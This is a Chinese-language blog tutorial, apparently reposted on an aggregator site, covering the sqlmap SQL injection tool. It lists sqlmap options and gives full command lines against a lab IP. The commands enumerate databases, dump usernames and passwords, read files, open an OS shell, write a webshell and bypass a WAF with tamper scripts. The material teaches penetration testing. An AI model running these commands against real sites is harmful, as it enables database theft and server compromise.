当前位置: 首页 > news >正文

注入之SQLMAP(工具注入)

i       sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。

       希望这篇文章能让你不仅有一定的收获,而且可以愉快的学习,如果有什么建议,都可以留言和我交流 

 sqlmap相关参数介绍

  • -u     get注入
  • -r      post注入
  • -r    --level     cookies注入 

执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。 

  • -v   信息级别显示 

ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。 

  • -p  针对单个参数注入
  • -threads     线程数
  • -batch-smart      智能判断测试
  • --moblie    模拟手机环境站点
  • -m    批量注入

注入获取数据的命令 (python版本为2.7.9)

  • --dbs    系统所有库名(自动检测数据库的类型) 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --dbs

  •  --current-db    获取当前数据库名
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --current-db 

  • --current-user   数据库管理系统的当前用户
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --current-user

  • --is-dba   判断当前的用户是否为系统管理员 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --is-dba 

true 是管理员false  没有权限

  • --users    系统所有的用户 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --users

  •  --tables   获取表名
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --tables -D abc

  • --coiumns      获取字段名 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --columns -T user -D abc

  • -T 表名 -C username,password --dump   数据的内容 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 =T user -C id,username,password,email --dump

  • 读取文件内容    --file-read   文件路径文件名 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --file-read c:\1.txt

  •  系统交互的shell   --os-shell
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --os-shell
  •  写webshell

 前提条件my.ini中的secure_file_priv=""要为空

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --file-write  "e:/1.txt" --file-dest "C:/phpstudy/WWW/3.php" -v1

  • sqlmap过waf     --tamper ""   多个参数用逗号隔开
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --tamper "base64encode.py" --dbs -v 4

http://www.lryc.cn/news/171355.html

相关文章:

  • Linux学习资源Index
  • 什么是SVG(可缩放矢量图形)?它与普通图像格式有何不同?
  • 求生之路2服务器搭建插件安装及详细的游戏参数配置教程windows
  • React TypeScript 定义组件的各种方式
  • 互联网摸鱼日报(2023-09-20)
  • AWS入列CNCF基金会
  • 岭回归与LASSO回归:解析两大经典线性回归方法
  • 数学建模——微分方程介绍
  • Minio入门系列【7】Spring Boot集成Minio
  • 抖音视频下载.py(23年9月份可用)
  • 项目基本搭建流程
  • 学习pytorch11 神经网络-非线性激活
  • Jenkins学习笔记2
  • 自动化测试:yaml结合ddt实现数据驱动!
  • 高效管理,轻松追踪——Chrono Plus for Mac任务管理工具
  • python项目2to3方案预研
  • MongoDB 是什么和使用场景概述(技术选型)
  • 打印 pyspark.sql.dataframe.DataFrame 有哪些列
  • 什么是虚拟DOM(Virtual DOM)?它在前端框架中的作用是什么?
  • QT实现简易时钟
  • win禁用更新,取消windows更新提示,禁用windows自动更新
  • 倒计时列表实现(小程序端Vue)
  • ContentType:application/x-www-form-urlencoded请求方法遇到的坑【PHP】
  • RabbitMQ - 死信、TTL原理、延迟队列安装和配置
  • 大数据与云计算实验一
  • 实施主品牌进化战略(一):确立主品牌进化架构
  • linux搭建单机ES,集成ik分词器,文本抽取,Kibana可视化平台
  • 金融和大模型的“两层皮”问题
  • 智能生活从这里开始:数字孪生驱动的社区
  • Python计算机二级知识点整理